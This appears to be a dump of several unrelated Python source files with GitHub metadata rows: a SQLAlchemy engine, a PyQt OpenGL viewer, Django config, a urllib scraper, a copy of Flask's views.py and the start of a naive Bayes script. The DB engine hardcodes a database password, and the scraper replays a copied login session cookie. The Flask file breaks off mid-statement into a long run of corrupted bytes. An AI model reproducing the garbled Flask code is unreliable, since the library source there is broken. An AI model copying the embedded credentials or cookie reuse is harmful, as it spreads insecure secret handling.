"ruggero.cortini@crg.eu"
] | ruggero.cortini@crg.eu |
f0ddcfc1386615bfe664efdcc8da103a73ee296d | 05cde6f12d23eb67258b5a21d4fb0c783bcafbe5 | /almebic/models/engine/db_engine.py | 1078b54006ced768772dd3efb6b54c9b7762b300 | [] | no_license | alejolo311/DataInMotion | f5aff692bcaf9a795969951146f6ab7dc6557b08 | 75014600785f9d7f8a4771a9bb24e322e812d08f | refs/heads/master | 2023-05-13T00:57:41.407175 | 2020-07-26T00:51:49 | 2020-07-26T00:51:49 | 267,895,607 | 3 | 2 | null | 2023-05-01T21:26:16 | 2020-05-29T15:46:04 | CSS | UTF-8 | Python | false | false | 2,083 | py | #!/usr/bin/python3
"""
Controls the ORM transactions using postgres db
"""
from models.base import BaseNode, Base
from models.user import User
from models.board import Board
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
class DBEngine:
__engine = None
__session = None
def __init__(self):
"""
Creates the engine object using environment variables
"""
user = 'data_im_dev'
password = 'dim_passwd'
host = '172.21.0.2'
db = 'data_im_dev_db'
self.__engine = create_engine('postgres://{}:{}@{}:5432/{}'.format(
user, password, host, db
))
def reload(self):
"""
Creates the Models based on metadata
"""
try:
Base.metadata.create_all(self.__engine)
sess_factory = sessionmaker(bind=self.__engine,
expire_on_commit=False)
Session = scoped_session(sess_factory)
self.__session = Session
except Exception as e:
print(e)
def all(self, cls=None):
"""
Returns all record, or all by class
"""
newdict = {}
objs = self.__session.query(cls).all()
for obj in objs:
key = obj.__class__.__name__ + '.' + obj.id
newdict[key] = obj
return (newdict)
def new(self, obj):
"""
Creates a new object
"""
self.__session.add(obj)
def save(self):
"""
Saves changes in session
"""
self.__session.commit()
def close(self):
"""
Remove the private session
"""
self.__session.remove()
def get(self, cls, id):
"""
Resturn a record by class and id
"""
objs = self.all(cls)
for obj in objs.values():
if obj.id == id:
return obj
return None
def delete(self, obj):
"""
Deletes a record
"""
self.__session.delete(obj)
| [
"danrodcastillo1994@gmail.com"
] | danrodcastillo1994@gmail.com |
5c7c61ee18b55c89bf1cc0161fca330fba4c2d0e | 11bb8d8bdea2b62013dc6f41b353ac1b9a3fd240 | /ViewerQt.py | a1ec70afc0d0fe8b66b4f2dbb9c2fffc0cfd7c87 | [] | no_license | ezz666/AbstractViewer | 151e6469ab94b3e3dc407faeb3179212071dc5f4 | 511d1bf822a0faa830299c95dc44042cef3c4a70 | refs/heads/master | 2022-12-06T17:37:10.093735 | 2020-08-28T04:18:02 | 2020-08-28T04:18:02 | 110,108,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,548 | py | # -*- coding: utf-8 -*-
from PyQt4 import QtGui, QtCore, QtOpenGL, Qt
from UniversalViewer import *
from SceneQt import *
KeycodeToKeyname ={
QtCore.Qt.Key_F1:"F1", QtCore.Qt.Key_F2:"F2", QtCore.Qt.Key_F3:"F3",
QtCore.Qt.Key_F4:"F4", QtCore.Qt.Key_F5:"F5", QtCore.Qt.Key_F6:"F6", QtCore.Qt.Key_F7:"F7",
QtCore.Qt.Key_F8:"F8", QtCore.Qt.Key_F9:"F9", QtCore.Qt.Key_F10:"F10", QtCore.Qt.Key_F11:"F11",
QtCore.Qt.Key_F12:"F12", QtCore.Qt.Key_Left:"LEFT", QtCore.Qt.Key_Up:"UP", QtCore.Qt.Key_Right:"RIGHT",
QtCore.Qt.Key_Down:"DOWN", QtCore.Qt.Key_PageUp:"PAGE_UP", QtCore.Qt.Key_PageDown:"PAGE_DOWN",
QtCore.Qt.Key_Home:"HOME", QtCore.Qt.Key_End:"END", QtCore.Qt.Key_Insert:"INSERT"
}
class FrameQt(QtGui.QWidget):
def __init__(self, parent=None):
super(FrameQt, self).__init__(parent)
#wx.Frame.__init__(self,None, -1, "RunDemo: ",size = (900,900),
#name="run a sample")
self.vbox = QtGui.QVBoxLayout()
self.setLayout(self.vbox)
#self.SetSizerAndFit(self.layout)
self.show()
def add(self, wdg, proportion= 1):
self.vbox.addWidget(wdg, proportion)
self.show()
class ViewerQt(UniversalViewer, QtGui.QApplication):
def __init__(self, pipe, argv):
QtGui.QApplication.__init__(self,argv)
#super(ViewerQt, self).__init__(argv)
UniversalViewer.__init__(self, pipe)
#self.OnInit()
#wx.App.__init__(self, redirect=False)
#self.ExitOnFrameDelete=True
self.argv= argv
#print("ViewerQt init done")
def InitGL(self):
#frame.CreateStatusBar()
frame = FrameQt()
# set the frame to a good size for showing the two buttons
#win.SetFocus()
#self.window = win
#frect = frame.GetRect()
#glarglist = int_array(len(attrib_list))
#for i, v in enumerate(attrib_list):
# glarglist[i] = v
frame.setFocus()
#self.cbox = Scene2DWX(frame)
#self.cbox.GL_init()
self.V = Scene3DQT(frame)#, glarglist)
self.V.setFocus()
self.frame = frame
UniversalViewer.InitGL(self)
frame.add(self.V, 300)
frame.show()
return True
def add_pal(self, name, pal_list):
'''Добавляет палитру с именем name и цветами заданными в виде списка float со значениями от 0 до 1,
они групируются по 3 формируя цвета, длина округляется до ближайшей снизу кратной 3'''
self.V.MakeCurrent()
UniversalViewer.add_pal(self, name, pal_list)
#def WakeUp(self):
# wx.WakeUpIdle()
def OnPaint(self, event):
#print("ViewerQt paint")
self.Draw()
def Draw(self):
self.V.MakeCurrent()
self.display()
#self.cbox.SetCurrent(self.cbox.context)
#print("DRAW")
def Bind(self):
#self.V.Bind(wx.EVT_PAINT, self.OnPaint)
#print("Start bind")
self.V.paintGL = lambda : self.OnPaint(None)
#self.frame.Bind(wx.EVT_CLOSE, self.OnExitApp)
#print("Bind paintGL")
self.V.resizeGL = lambda w,h: self.V.reshape(w,h)
#print("Bind resize")
self.aboutToQuit.connect(self.OnExitApp)
self._timer = QtCore.QTimer(self)
self._timer.setInterval(0)
self._timer.timeout.connect(self.OnIdle)
self.V.mousePressEvent = self.mousePressEvent
self.V.mouseReleaseEvent = self.mouseReleaseEvent
self.V.mouseMoveEvent = self.mouseMoveEvent
self.V.wheelEvent = self.wheelEvent
#self.frame
#self.V.Bind(wx.EVT_SIZE, self.OnSize)
#self.V.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
#self.V.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
#self.V.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
#self.V.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
#self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#self.V.Bind(wx.EVT_MOUSEWHEEL, self.OnWheelRotate)
self.KeyDownHandler = self.get_key_function(self.KeyDown)
self.KeyUpHandler = self.get_key_function(self.KeyUp)
self.SpecialKeyDownHandler = self.get_key_function(self.SpecialKeyDown)
self.SpecialKeyUpHandler = self.get_key_function(self.SpecialKeyUp)
self.V.keyPressEvent = self.OnKeyDown
self.V.keyReleaseEvent = self.OnKeyUp
##self.frame.Bind(wx.EVT_CHAR_HOOK, self.CharHook)
##self.V.Bind(wx.EVT_CHAR, self.OnKeyDown)
#self.V.Bind(wx.EVT_KEY_DOWN,self.OnKeyDown)
##print(self.SpecialKeyDown)
#self.V.Bind(wx.EVT_KEY_UP,self.OnKeyUp)
#self.V.Bind(wx.EVT_IDLE, self.OnIdle)
#self.timer = wx.Timer(self)
#self.V.Bind(wx.EVT_TIMER, self.OnTimer)
#self.timer.Start(42)
#print("ViewerQt bind")
def exit(self):
"Закрывает окно и завершает програму"
if (self._closed == True): return
self._closed = True
#os.kill(self._t.pid,signal.SIGHUP)
#self.rl_reader.lock.acquire()
#self.rl_reader.lock.release()
#self._t.join()
#glutLeaveMainLoop()
#self.frame.Show(True)
#self.frame.SetFocus()
#self.frame.Close(True)
self.reader_pipe.send(("exit", None))
exit()
#self.ExitMainLoop()
def OnTimer(self, evt):
self.WakeUp()
def SetWindowTitle(self, string):
self.frame.setWindowTitle(string)
def OnExitApp(self):
self.exit()
def OnSize(self, event):
self.V.MakeCurrent()
self.V.autoreshape()
#event.Skip()
def OnIdle(self):
self.idle()
self.V.setFocus()
def OnKey(self,evt):
k = evt.key()
sp_key = k in KeycodeToKeyname
#print(k)
if not sp_key:
if six.PY3:
k = evt.text().lower()
else:
k = str(evt.text()).lower()
else:
if k in KeycodeToKeyname:
k= KeycodeToKeyname[k]
else: k = "None"
#x,y = evt.pos().x(), evt.pos().y()
x,y =0,0
mod = {"Ctrl":(evt.modifiers() & QtCore.Qt.ControlModifier) == QtCore.Qt.ControlModifier,
"Shift":(evt.modifiers() & QtCore.Qt.ShiftModifier) == QtCore.Qt.ShiftModifier,
"Alt":(evt.modifiers() & QtCore.Qt.AltModifier) == QtCore.Qt.AltModifier}
return k,x,y,mod, sp_key
def OnKeyDown(self,evt):
k,x,y,mod,spec= self.OnKey(evt)
#print(k,mod,spec,"DOWN")
if spec: self.SpecialKeyDownHandler(k,x,y,mod)
else: self.KeyDownHandler(k,x,y,mod)
#evt.Skip()
def OnKeyUp(self,evt):
k,x,y,mod, spec = self.OnKey(evt)
#print(k,mod,spec,"UP")
if spec: self.SpecialKeyUpHandler(k,x,y,mod)
else: self.KeyUpHandler(k,x,y,mod)
#def CharHook(self,evt):
# evt.DoAllowNextEvent()
# print(evt.GetUnicodeKey(), evt.IsNextEventAllowed())
# evt.Skip()
def OnMouseDown(self,evt):
#self.V.CaptureMouse()
pos = evt.pos()
return pos.x(),pos.y()
def mousePressEvent(self, evt):
if evt.buttons() & QtCore.Qt.LeftButton:
self.OnLeftDown(evt)
if evt.buttons() & QtCore.Qt.RightButton:
self.OnRightDown(evt)
def mouseReleaseEvent(self, evt):
if not (evt.buttons() & QtCore.Qt.LeftButton):
self.OnLeftUp(evt)
if not (evt.buttons() & QtCore.Qt.RightButton):
self.OnRightUp(evt)
def OnLeftDown(self, evt):
self.V.mouse_left_click(*self.OnMouseDown(evt))
self.bb_auto = False
def OnLeftUp(self, evt):
self.V.mouse_left_release(*self.OnMouseDown(evt))
self.bb_auto = False
def OnRightDown(self, evt):
self.V.mouse_right_click(*self.OnMouseDown(evt))
def OnRightUp(self, evt):
self.V.mouse_right_release(*self.OnMouseDown(evt))
def wheelEvent(self,evt):
self.bb_auto = False
rot = evt.delta()/120#evt.WheelRotation
delta = 1.#evt.delta()
#print("WHEEL", int(abs(rot)/delta))
if rot>0:
self.bb_auto = False
for i in range(int(abs(rot)/delta)):
self.V.mouse_wheel_up()
self.V.update()
elif rot<0:
self.bb_auto = False
for i in range(int(abs(rot)/delta)):
self.V.mouse_wheel_down()
self.V.update()
def mouseMoveEvent(self, evt):
#if evt.Dragging():
self.V.drag(evt.x(), evt.y())
self.V.update()
def MainLoop(self):
#print("Start Main Loop")
self._timer.start()
self.exec_()
class PaletteWidget(Scene2DQT):
def __init__(self, parent=None):
self.parent = parent
Scene2DQT.__init__(self,parent)
self.GL_init()
self.cbox = PaletteBox()
self.spr = Shader()
path_to_AV = os.path.dirname(__file__)
self.shader_extern_load(*map(lambda x : os.path.join(path_to_AV,x), ["2dv.shader","2df.shader"]) )
checkOpenGLerror()
self.palettes = {}
checkOpenGLerror()
#print("widget init")
#self.add_pal("pal", [1.,0.,0., 1.,.5,0., 1.,1.,0., 0.,1.,0., 0.,1.,1., 0.,0.,1., 1.,0.,1.])
#self.add_pal("rgb", [1.,0.,0.,0.,1.,0.,0.,0.,1.])
def toggle(self):
self.cbox.switch_vertical()
self.plot()
def shader_extern_load(self, vertex_string, fragment_string):
"Загружает шейдеры из файлов"
self.spr.extern_load(vertex_string, fragment_string)
def shader_load(self, vertex_string, fragment_string):
"Загружает шейдеры из строк"
self.spr.load(vertex_string, fragment_string)
def add_pal(self, name, pal_list):
'''Добавляет палитру с именем name и цветами заданными в виде списка float со значениями от 0 до 1,
они групируются по 3 формируя цвета, длина округляется до ближайшей снизу кратной 3'''
checkOpenGLerror()
#print("adding pal {}".format(name))
truncate3 = lambda x: x - x%3
nlen = truncate3(len(pal_list))
pal = float_array(nlen)
for i, v in enumerate(pal_list[:nlen]): pal[i] = v
self.MakeCurrent()
self.palettes[name] = Texture(pal, int(nlen/3))
def set_pal(self, pal_name):
"Устанавливает палитру"
checkOpenGLerror()
#print("setting pal {}".format(pal_name))
self.MakeCurrent()
self.tex = self.palettes[pal_name]
self.cur_pal = pal_name
self.cbox.set_texture( self.palettes[self.cur_pal] )
self.cbox.load_on_device()
def plot(self):
#print("Cbox plot")
self.MakeCurrent()
#self.cbox._load_on_device = self.cbox.load_on_device
#def myload():
# self.cbox._load_on_device()
# self.update()
#self.cbox.load_on_device = myload
self.cbox.load_on_device()
def display(self):
#print("Cbox display")
self.V.display()
self.spr.start()
self.tex.use_texture(self.spr,"pal")
self.V.plot(self.spr)
#self.V.plot(self.spr)
self.cbox.plot(self.spr)
self.spr.stop()
self.SwapBuffers()
def Draw(self):
checkOpenGLerror()
#print("Cbox DRAW")
self.MakeCurrent()
self.automove()
self.display()
def OnSize(self,evt):
self.MakeCurrent()
self.autoreshape()
self.automove()
self.update()
def OnPaint(self):
#print("CBOX paint")
self.MakeCurrent()
self.autoreshape()
self.Draw()
def BindAll(self):
#self.Bind(wx.EVT_PAINT, self.OnPaint)
#self.Bind(wx.EVT_SIZE, self.OnSize)
self.paintGL = self.OnPaint
#self.update = lambda : self.updateGL()
#self.frame.Bind(wx.EVT_CLOSE, self.OnExitApp)
self.resizeGL = lambda w,h: self.reshape(w,h)
#self.aboutToQuit.connect(self.OnExitApp)
#self._timer = QtCore.QTimer(self)
#self._timer.setInterval(0)
#self._timer.timeout.connect(self.OnIdle)
#self.V.mousePressEvent = self.mousePressEvent
#self.V.mouseReleaseEvent = self.mouseReleaseEvent
#self.V.mouseMoveEvent = self.mouseMoveEvent
#self.V.wheelEvent = self.wheelEvent
#self.V.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
#self.V.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
#self.V.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
#self.V.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
#self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#self.V.Bind(wx.EVT_MOUSEWHEEL, self.OnWheelRotate)
#self.KeyDownHandler = self.get_key_function(self.KeyDown)
#self.KeyUpHandler = self.get_key_function(self.KeyUp)
#self.SpecialKeyDownHandler = self.get_key_function(self.SpecialKeyDown)
#self.SpecialKeyUpHandler = self.get_key_function(self.SpecialKeyUp)
#self.V.Bind(wx.EVT_CHAR, self.OnKeyDown)
#self.V.Bind(wx.EVT_KEY_DOWN,self.OnKeyDown)
#print(self.SpecialKeyDown)
#self.V.Bind(wx.EVT_KEY_UP,self.OnKeyUp)
class PaletteAdjuster(PaletteWidget):
def __init__(self, parent=None):
PaletteWidget.__init__(self, parent)
self._sprs = [self.spr,Shader()]
self._cur_spr = 0
self.switch_spr(1)
path_to_AV = os.path.dirname(__file__)
self.shader_extern_load(*map(lambda x : os.path.join(path_to_AV,x), ["2dv_const_c.shader","2df_const_c.shader"]) )
self.adjuster_widget = PaletteAlphaControl(self.cbox)
self.switch_spr(0)
def switch_spr(self, i):
"Переключает шейдерную программу, служебная функция"
self.spr = self._sprs[i]
self._cur_spr = i
def set_pal(self, pal_name):
"Устанавливает палитру"
checkOpenGLerror()
#print("Adjuster set_pal start")
PaletteWidget.set_pal(self, pal_name)
checkOpenGLerror()
#print("Adjuster set_pal end")
self.MakeCurrent()
#print("Adjuster pal load")
self.load_on_device()
checkOpenGLerror()
#print("Adjuster pal loaded")
self.update()
def display(self):
checkOpenGLerror()
#print("Adjuster display")
self.V.display()
self.switch_spr(0)
self.spr.start()
self.tex.use_texture(self.spr,"pal")
self.V.plot(self.spr)
self.cbox.plot(self.spr)
self.spr.stop()
self.switch_spr(1)
self.spr.start()
self.V.plot(self.spr)
self.adjuster_widget.plot(self.spr)
self.spr.stop()
checkOpenGLerror()
self.SwapBuffers()
def set_alpha(self, color_num, alpha):
set_alpha__(self,color_num, alpha)
def set_alpha__(self,color_num, alpha):
self.MakeCurrent()
self.adjuster_widget.set_alpha(color_num, alpha)
self.update()
def load_on_device(self):
#print("Adjuster load on device")
self.MakeCurrent()
#print("Loading pal")
self.cbox.load_on_device()
checkOpenGLerror()
#print("Loading line")
self.adjuster_widget.load_on_device()
checkOpenGLerror()
#print("Line loaded")
#self.update()
#print("widget updated")
def plot(self):
flushOpenGLerror()
#print("Adjuster plot pal =", self.cur_pal)
#self.MakeCurrent()
self.load_on_device()
def OnLeftDown(self, evt):
#scale = self.GetContentScaleFactor()
x,y = evt.pos().x(), evt.pos().y()
#x*=scale
#y*=scale
w,h = self.width, self.height
texlength = self.tex.get_length()
if self.cbox.get_vertical():
self.set_alpha( int((h-y)*texlength/h), float(x)/w)
else:
self.set_alpha( int(x*texlength/w), float(h-y)/h)
def BindAll(self):
PaletteWidget.BindAll(self)
#self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
self.mousePressEvent = self.OnLeftDown
| [
"khilkov.s@gmail.com"
] | khilkov.s@gmail.com |
0c903067d722c171d51ba253b0cd08e9555ab90d | 8f9daf08250f09269aeb8d57fcbb6f335e2d985a | /inPython/COURSERA/Google IT Automation/week4/classes.py | 9b278ff7b15acf64ab137af0bdb98e4d6629575e | [] | no_license | Extomvi/GDGUnilag | 0927a213e43fc4c463e6866e5ca4dbf137311b91 | e8ac9c61af43bb99542c5bd6dcfe35fa64fee957 | refs/heads/master | 2023-06-22T06:32:53.793377 | 2023-06-14T08:15:39 | 2023-06-14T08:15:39 | 100,798,237 | 2 | 0 | null | 2023-04-04T16:43:17 | 2017-08-19T14:05:15 | Jupyter Notebook | UTF-8 | Python | false | false | 256 | py | '''
UNDERSTANDING CLASSES, THEIR METHODS AND INSTANCES
'''
class Apple:
color = ""
flavor = ""
fruit = Apple()
fruit.color = "red"
fruit.flavor = "sweet"
veg = Apple()
veg.color = "green"
veg.flavor = "bleh"
print(fruit.color)
print(veg.flavor) | [
"exceltadedokun@gmail.com"
] | exceltadedokun@gmail.com |
047bc47c0d7041fcc94fc2b639483f7703c4ef57 | 91d7a80cca074fc699e4af86e0f01c58452cc217 | /venv/bin/django-admin.py | 974aa14dbb0eef8390154b006d3dce67c6c593ad | [] | no_license | Link1996miky/web_link_1_04 | 641d023d06f3bb742dcccffb422ae0eb43c0b9b4 | b9b3f29cc6889699879d218c49fafa736081af8e | refs/heads/master | 2020-04-07T04:49:56.959039 | 2018-12-16T16:10:12 | 2018-12-16T16:10:12 | 158,070,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | #!/home/link/PycharmProjects/web_link_1_04/venv/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"512819631@qq.com"
] | 512819631@qq.com |
9f1f74e62bef70ee0ffbeaa5127edc6c1ab5c5f4 | cd73b7eefdac19039d2f3ab1e48e31aa3ee0bbaf | /Urllib/urllib_cookie.py | aed5511a1aa0412ddb2f623235c6db045a848747 | [] | no_license | AssassinHotstrip/personal_spider_pra | 75efa979a142f89960705e571231e8262fe44dd6 | 298869fa9fb0291b9e364fbf4a6d8bd992840eb2 | refs/heads/master | 2020-04-12T11:09:29.502059 | 2019-01-01T13:55:48 | 2019-01-01T13:55:48 | 162,450,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,190 | py | import urllib.request
def send_request():
url_list = [
"http://www.renren.com/335681111/profile",
"http://www.renren.com/376602323/profile"
]
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
# "Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
# 重点:通过抓包获取登录用户的cookie,可以直接访问登录后才能访问的页面
"Cookie": "anonymid=jpksloq576khwr; depovince=GW; _r01_=1; JXsgHEw; ick_login=9c4b2fwf53c-4585-4fwerew454554c-8a4537b-4868da280f90; _de=357231A48437FE1A247380B22A94C474696BF75400CE19CC; ick=73a512c4-e2a6-4cb4-8b38-ca91b727329c; __utma=15114tewtwf6938.1908916267.1544596057.1544596057.1544596057.1; __utmc=151wrewr146938; __utmz=151146938.1544596057.1.1.utmcsr=renren.com|utmccn=(referral)|utmcmd=wefwf|utmcct=/; __utmb=151146938.4.10.1544596057; jebecookies=74e6c1e6-9b9a-48ef-97a6-d243984caecc|||||; p=39f8205f846d7651e5637fewfwf5402bc0e4ef9; first_login_flag=1; ln_uact=655654191@qq.com; ln_hurl=http://hdn.xnimg.cn/photos/hdn121/20121209/2000/h_main_dkJa_7e500fwf00042161375.jpg; t=03ca85b59ewrrwr3420ba7f6fe9889; societyguester=03ca85b5fwf9db08585eb84a0ba7f6fe9889; id=335684059; xnsid=5ee445ea; loginfrom=syshome; ch_id=10016; jebe_key=f8ec8a51-b9c5-4c06-b1dc-2cf7de00f7cf%7C60eaa7a2aa1b3966a819f29c5fb94eae%7C1544596211030%7C1%7C1544596209079; wp_rewrwfold=0; ewrwe",
"Host": "www.renren.com",
"Referer": "http://friend.renren.com/managefriends",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3514.0 Safari/537.36"
}
for index, url in enumerate(url_list):
request = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(request)
with open(str(index)+".html", "wb") as f:
f.write(response.read())
if __name__ == '__main__':
send_request() | [
"670204191@qq.com"
] | 670204191@qq.com |
2f3f185e61fb9c48ca1ddc7abc2b366463a5e4e2 | eb233dfdb6819c038886f5c5b6f5b82538acd283 | /backendDjango/urls.py | ada8bcd16a0603d28b646880f22f9224223b1dfc | [] | no_license | mira87/adultingtasks-backend | 8c2b80940d5622b40a05b38ec5fd73aff5e6700f | 9c635dcacca0180f8ede1acc6a8612314c3a7189 | refs/heads/master | 2020-09-12T19:00:04.477318 | 2019-11-18T20:44:28 | 2019-11-18T20:44:28 | 222,519,040 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,029 | py | """backendDjango URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from rest_framework import routers
from adultingapp import views
router=routers.DefaultRouter()
router.register(r'adultingtasks', views.AdultingTask,'adultingtask')
router.register(r'categories', views.Category,'categories')
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include(router.urls))
]
| [
"shamirajones@shamiras-mbp.home"
] | shamirajones@shamiras-mbp.home |
902df8b01bd58a51daaf42646c78c4e62c3a51c4 | a4ea1019fa143bf1578f9176796052736d436fdb | /venv/Lib/site-packages/flask/views.py | 24cb5e2ba4b9061d2639e255b8635f2d4d8cd728 | [] | no_license | KeiKooLoc/Denend.github.io | 16f60fc4d2ecb9bdc8b685f2fcea4fdacca4f13d | 15f900ad0a0a6ea68a64ff7f9762c61cf60595af | refs/heads/master | 2020-03-29T13:41:57.236863 | 2019-04-22T20:49:04 | 2019-04-22T20:49:04 | 149,977,191 | 0 | 0 | null | 2018-09-23T11:16:24 | 2018-09-23T11:16:24 | null | MacCentralEurope | Python | false | false | 5,836 | py | # -*- coding: utf-8 -*-
"""
flask.views
~~~~~~~~~~~
This module provides class-based views inspired by the ones in Django.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from .globals import request
from ._compat import with_metaclass
http_method_funcs = frozenset(['get', 'post', 'head', 'options',
'delete', 'put', 'trace', 'patch'])
class View(object):
"""Alternative way to use view functions. A subclass has to implement
:meth:`dispatch_request` which is called with the view arguments from
the URL routing system. If :attr:`methods` is provided the methods
do not have to be passed to the :meth:`~flask.Flask.add_url_rule`
method explicitly::
class MyView(View):
methods = ['GET']
def dispatch_request(self, name):
return 'Hello %s!' % name
app.add_url_rule('/hello/<name>', view_func=MyView.as_view('myview'))
When you want to decorate a pluggable view you will have to either do that
when the view function is created (by wrapping the return value of
:meth:`as_view`) or you can use the :attr:`decorators` attribute::
class SecretView(View):
methods = ['GET']
decorators = [superuser_required]
def dispatch_request(self):
...
The decorators stored in the decorators list are applied one after another
when the view function is created. Note that you can *not* use the class
based decorators since those would decorate the view class and not the
generated view function!
"""
#: A list of methods this view can handle.
methods = None
#: Setting this disables or force-enables the automatic options handling.
provide_automatic_options = None
#: The canonical way to decorate class-based views is to decorate the
#: return value of as_view(). However since this moves parts of the
#: logic from the class declaration to the place where it's hooked
#: into the routing system.
#:
#: You can place one or more decorators in this list and whenever the
#: view function is created the result is automatically decorated.
#:
#: .. versionadded:: 0.8
decorators = ()
def dispatch_request(self):
"""Subclasses have to override this method to implement the
actual view function code. This method is called with all
the arguments from the URL rule.
"""
raise NotImplementedError()
@classmethod
def as_view(cls, name, *class_args, **class_kwargs):
"""Converts the class into an actual view function that can be used
with the routing system. Internally this generates a function on the
fly which will instantiate the :class:`View` on each request and call
the :meth:`dispatch_request` method on it.
The arguments passed to :meth:`as_view` are forwarded to the
constructor of the class.
"""
def view(*args, **kwargs):
self = view.view_class(*class_args, **class_kwargs)
return self.dispatch_request(*args, **kwargs)
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# We attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods
view.provide_automatic_options = cls.provide_automatic_options
return view
class MethodViewType(type):
"""Metaclass for :class:`MethodView` that determines what methods the view
defines.
"""
def __init__(cls, name, bases, d):
super(MethodViewType, cls).__init__(name, bases, d)
if 'methods' not in d:
methods = set()
for key in http_method_funcs:
if hasattr(cls, key):
methods.add(key.upper())
# If we have no method at all in there we don't want to add a
# method list. This is for instance the case for the base class
# or another subclass of a base method view that does not introduce
# new methods.
if methods:
cls.methods = methods
class MethodView(with_metaclass(MethodViewType, View)):
"""A class-based view that dispatches request methods to the corresponding
class methods. For example, if you implement a ``get`` method, it will be
used to handle ``GET`` requests. ::
class CounterAPI(MethodView):
def get(self):
return session.get('counter', 0)
def post(self):
session['counter'] = session.get('counter', 0) + 1
return 'OK'
app.add_url_rule('/counter', view_func=CounterAPI.as_view('counter'))
"""
def dispatch_request(self, *args, **kwargs):
meth = getattr(self, request.method.lower(), None)
# If the request method is HEAD and we don't have a handler for it
# retry with GET.
if meth is None and request.method == 'HEAD':
meth = getattr(self, 'get', None)
asseˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇ | [
"denend@users.noreply.github.com"
] | denend@users.noreply.github.com |
c1a3bb0799df7204d756f505eb6a62faf5ca08e0 | 9dfda55d16ee16df8762a9987e154244d8ff948d | /web/migrations/0006_auto_20160512_1957.py | 9927bacc7dc31a6c359b9546fa87c33f9dbb39e5 | [] | no_license | damikdk/Excel-Django-Angular | 78b191ca56536167f3d4dbd2ac3fc03d87586d5c | c29d9dda0fa6604c54f8a2df684f9e4d07f6b549 | refs/heads/master | 2021-01-17T10:31:06.235997 | 2016-07-12T12:26:19 | 2016-07-12T12:26:19 | 58,670,651 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-12 19:57
from __future__ import unicode_literals
from django.db import migrations, models
import web.validators
class Migration(migrations.Migration):
dependencies = [
('web', '0005_remove_officefile_max_coor'),
]
operations = [
migrations.AlterField(
model_name='officefile',
name='file',
field=models.FileField(upload_to='', validators=[web.validators.validate_file_extension]),
),
]
| [
"damikdk@gmail.com"
] | damikdk@gmail.com |
35fe9e8d12cff46a0e0ea7b51843e2426507bb4a | 59e87634c67508bf7eba8c8b9845354aefa57bc7 | /ML/naiveBayes/bayes-titanic.py | b9caec4be2a8acf3fb164902e7017e85f90efa1c | [] | no_license | Caohengrui/MLAndDL | 48729b94b2232e628b699cf8d0d4a6c6e81a36f5 | d0637f58f45e9c091cd90bbfe9c207223d0994f3 | refs/heads/master | 2023-03-16T01:06:03.316463 | 2020-04-14T07:44:15 | 2020-04-14T07:44:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,446 | py | """
Author:wucng
Time: 20200110
Summary: 朴素贝叶斯对titanic数据分类
源代码: https://github.com/wucng/MLAndDL
参考:https://cuijiahua.com/blog/2017/11/ml_4_bayes_1.html
"""
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler,MinMaxScaler
# from sklearn.neighbors import KNeighborsRegressor,KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score,auc
import pandas as pd
import numpy as np
from functools import reduce
from collections import Counter
import pickle,os,time
# 1.加载数据集(并做预处理)
def loadData(dataPath: str) -> tuple:
